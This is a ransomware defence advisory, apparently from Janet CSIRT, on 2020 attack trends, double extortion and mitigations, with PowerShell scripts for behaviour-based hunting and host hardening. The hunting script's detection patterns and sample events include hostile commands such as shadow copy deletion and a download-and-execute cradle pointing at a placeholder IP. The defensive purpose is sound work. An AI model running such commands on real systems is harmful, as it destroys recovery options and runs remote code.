Throughout 2020 we have seen different ransomware families using a range of attack methods and operational techniques to infiltrate networks. Families seen include Ryuk, Ouroboros, Cryakl, REvil (also known as Sodinokibi), Mapo and Corona-lock. One common initial infection vector has been commodity malware such as TrickBot, commonly seen in the "triple threat" chain of Emotet, TrickBot and Ryuk. While infection via malware is still seen, the rate of infection by other methods has increased. Previously, access over RDP was mostly seen alongside malware; it has now become the most common initial access technique, using stolen credentials. The REvil group also commonly exploits known vulnerabilities and was seen exploiting the Pulse Secure VPN vulnerability CVE-2019-11510 in January. This increase in infection vectors that do not rely on malware emphasises the importance of keeping internet-facing services patched and up to date, and of protecting the credentials used to reach them.
Beyond the initial infection, most ransomware operators aim to traverse the network in order to reach as many devices as possible. Some also attempt to obtain administrative rights to get past privilege restrictions, and Mimikatz has been seen used for this, dumping credentials from memory on an already compromised host. For lateral movement both PsExec and RDP have been seen.
Some traditional antivirus solutions not only fail to detect many ransomware families but can also be switched off during the infection process. Some ransomware events have used PowerShell and batch files to run malicious scripts; these are often not detected by traditional AV because the interpreters that run them are legitimate, allow-listed Windows binaries. This is why modern behaviour-based EDR solutions are recommended: they can detect ransomware, and even zero-day threats, from the tactics and techniques being used rather than relying only on known signatures. Many of these solutions will also alert you to newly published vulnerabilities relevant to your systems.
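A behaviour-based check of the kind this paragraph describes, as an added example that is not part of this advisory or of any vendor product: it reads PowerShell script block log events and flags actions commonly seen during a ransomware deployment (shadow copy deletion, encoded commands, credential dumping, download cradles) regardless of which family is running them. The sample events at the bottom are constructed, and the indicator patterns are an assumed starting set rather than a published list.

```powershell
# Added example (not Janet CSIRT tooling): hunt over PowerShell script block
# log events for behaviour commonly seen before encryption, instead of relying
# on a signature for a particular sample. Live use needs script block logging
# enabled (Event ID 4104 in Microsoft-Windows-PowerShell/Operational).
# The sample events at the bottom are constructed; the patterns are starting
# points to tune for your own estate.

$SuspiciousPatterns = @(
    @{ Name = 'Shadow copy deletion';    Regex = 'vssadmin(\.exe)?\s+delete\s+shadows|Win32_ShadowCopy.*Delete' }
    @{ Name = 'Backup catalog deletion'; Regex = 'wbadmin(\.exe)?\s+delete\s+catalog' }
    @{ Name = 'Recovery disabled';       Regex = 'bcdedit.*recoveryenabled\s+no' }
    @{ Name = 'Encoded command';         Regex = '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}' }
    @{ Name = 'Credential dumping';      Regex = 'Invoke-Mimikatz|sekurlsa::logonpasswords' }
    @{ Name = 'Defender tampering';      Regex = 'Set-MpPreference\s+-Disable(RealtimeMonitoring|IOAVProtection)' }
    @{ Name = 'Download cradle';         Regex = 'Net\.WebClient.*Download(String|File)|Invoke-WebRequest.*-OutFile' }
)

function Find-SuspiciousScriptBlock {
    param(
        # Objects carrying TimeCreated, Computer and ScriptBlockText (see Get-ScriptBlockEvent)
        [Parameter(Mandatory)] [object[]] $Events
    )
    foreach ($evt in $Events) {
        $text = $evt.ScriptBlockText -replace '\s+', ' '
        foreach ($p in $SuspiciousPatterns) {
            # -match is case-insensitive by default, which suits randomised casing
            if ($text -match $p.Regex) {
                [pscustomobject]@{
                    TimeCreated = $evt.TimeCreated
                    Computer    = $evt.Computer
                    Indicator   = $p.Name
                    Excerpt     = $text.Substring(0, [Math]::Min(80, $text.Length))
                }
            }
        }
    }
}

function Get-ScriptBlockEvent {
    # Pull live 4104 events from this host; feed the result to Find-SuspiciousScriptBlock
    param([int] $Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            TimeCreated     = $_.TimeCreated
            Computer        = $_.MachineName
            ScriptBlockText = $_.Properties[2].Value   # third field of a 4104 event is the script text
        }
    }
}

# Constructed sample events (not real telemetry) so the hunt runs offline
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'LAB-WS01'; ScriptBlockText = 'Get-ChildItem C:\Users | Measure-Object' }
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'LAB-WS02'; ScriptBlockText = 'vssadmin.exe delete shadows /all /quiet; wbadmin delete catalog -quiet; bcdedit /set {default} recoveryenabled no' }
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'LAB-WS03'; ScriptBlockText = 'powershell -nop -w hidden -enc ' + ('A' * 60) }
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'LAB-WS04'; ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")' }
)

Find-SuspiciousScriptBlock -Events $SampleEvents | Format-Table -AutoSize
# Live use on a host with script block logging enabled:
# Find-SuspiciousScriptBlock -Events (Get-ScriptBlockEvent -Hours 48) | Format-Table -AutoSize
```

Only LAB-WS02, LAB-WS03 and LAB-WS04 produce rows; the benign directory listing on LAB-WS01 is ignored. Because the match is on what the script block does rather than on a file hash, the same rule fires for a batch file that shells out to vssadmin and for a freshly repacked loader, which is the point the paragraph makes about behaviour-based detection. Script block logging records the de-obfuscated block, so encoded or string-concatenated commands are still visible to these patterns when they run.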
A group recently in the media after a US university paid its ransom is Netwalker. Netwalker and REvil are among the ransomware groups that have adopted a double extortion model, in which they exfiltrate sensitive data from the victim before encrypting it. This creates a second threat: even if a victim can recover from the encryption using backups, the stolen data will still be published, exposing them to potential fines from data protection authorities and to reputational damage. These potential consequences are intended to pressure victims into paying the ransom.
Although Netwalker targets other sectors too, it has focused on education. UK organisations have been affected by the group before, but in the education sector only US universities have been seen so far. These attacks followed Netwalker's move to a ransomware-as-a-service (RaaS) model, so the group may expand further and become a threat to educational institutions here too.
To mitigate the most common ransomware attack methods, we recommend the following steps:
- Keep systems and software updated and patch known vulnerabilities
- Disable SMBv1 and use SMBv3
- Remove RDP from public IPs and put it behind a VPN
- Invest in heuristic, behaviour-based AV or EDR
- Implement architectural controls to segment the network
- Limit PowerShell execution and capture PowerShell logs (script block logging and transcripts)
- Check email attachments: disable macros in externally received documents and scan attachments for malware
- Keep isolated backups and test that they restore
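The host-level items in that list applied with PowerShell, as an added example rather than a Janet CSIRT baseline script. The VPN address range 10.8.0.0/24, the transcript directory, the Office policy version key 16.0 and the function names are assumptions to replace with your own values; network segmentation and isolated backups are architectural controls and are not covered by the script.

```powershell
# Added example (not Janet CSIRT's own baseline): applies the host-level items
# from the list above to one Windows 10 / Server 2016+ machine. Run elevated.
# Assumed values to replace: the VPN pool 10.8.0.0/24, the transcript
# directory and the Office policy version key 16.0.
#Requires -RunAsAdministrator

function Disable-Smb1 {
    # Stop the server offering SMBv1; SMBv2 and SMBv3 remain enabled
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Remove the optional component so the client-side driver goes too (client SKUs)
    $feature = Get-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol' -ErrorAction SilentlyContinue
    if ($feature -and $feature.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol' -NoRestart | Out-Null
    }
}

function Limit-RdpExposure {
    param([string[]] $AllowedRanges = @('10.8.0.0/24'))   # assumed VPN pool
    # Scope the built-in inbound Remote Desktop rules to the VPN range only
    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound |
        Set-NetFirewallRule -RemoteAddress $AllowedRanges -Enabled True
    # Require Network Level Authentication: credentials are checked before a session exists
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' `
        -Name 'UserAuthentication' -Type DWord -Value 1
}

function Enable-PowerShellLogging {
    param([string] $TranscriptDir = 'C:\PSTranscripts')   # assumed; use a write-only central share in production
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Script block logging -> Event ID 4104: the content of every block, after de-obfuscation
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Type DWord -Value 1
    # Module logging for all modules -> Event ID 4103: pipeline execution details
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name 'EnableModuleLogging' -Type DWord -Value 1
    New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null
    # Transcripts of every session, with invocation headers, to disk
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name 'EnableTranscripting' -Type DWord -Value 1
    Set-ItemProperty -Path "$base\Transcription" -Name 'EnableInvocationHeader' -Type DWord -Value 1
    Set-ItemProperty -Path "$base\Transcription" -Name 'OutputDirectory' -Value $TranscriptDir
    # Execution policy raises the bar for ad-hoc scripts but is not a security boundary
    # (-ExecutionPolicy Bypass defeats it); real restriction needs AppLocker or WDAC.
    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
}

function Block-InternetMacro {
    # Office policy "Block macros from running in Office files from the Internet" (Office 2016+).
    # HKCU applies to the current user only; push the same value by Group Policy for everyone.
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"   # 16.0 assumed
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Type DWord -Value 1
    }
}

function Test-RansomwareBaseline {
    # Read the settings back so the change can be verified and reported
    $rdp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    [pscustomobject]@{
        Smb1Disabled       = -not (Get-SmbServerConfiguration).EnableSMB1Protocol
        RdpNlaRequired     = (Get-ItemProperty -Path $rdp).UserAuthentication -eq 1
        RdpAllowedFrom     = (Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound |
                                  Get-NetFirewallAddressFilter).RemoteAddress | Sort-Object -Unique
        ScriptBlockLogging = (Get-ItemProperty -Path $sbl -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1
    }
}

Disable-Smb1
Limit-RdpExposure
Enable-PowerShellLogging
Block-InternetMacro
Test-RansomwareBaseline | Format-List
```

Running this by hand on one host is only useful for a lab or a single server; across an estate the same registry values and firewall scope belong in Group Policy so that they cannot drift and so that a machine rebuilt from an image comes back hardened. Scoping the firewall rule to the VPN pool does nothing if RDP is still reachable through a NAT rule on the perimeter, so check the external view with a port scan from outside as well.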
If you suffer a ransomware event, it is important to follow the SANS incident response lifecycle (preparation, identification, containment, eradication, recovery and lessons learned): identify the infection, contain the outbreak, and make sure the accounts, devices and logs involved have been captured and remediated before restoring from isolated backups. Janet CSIRT can assist with incident response, including digital forensics.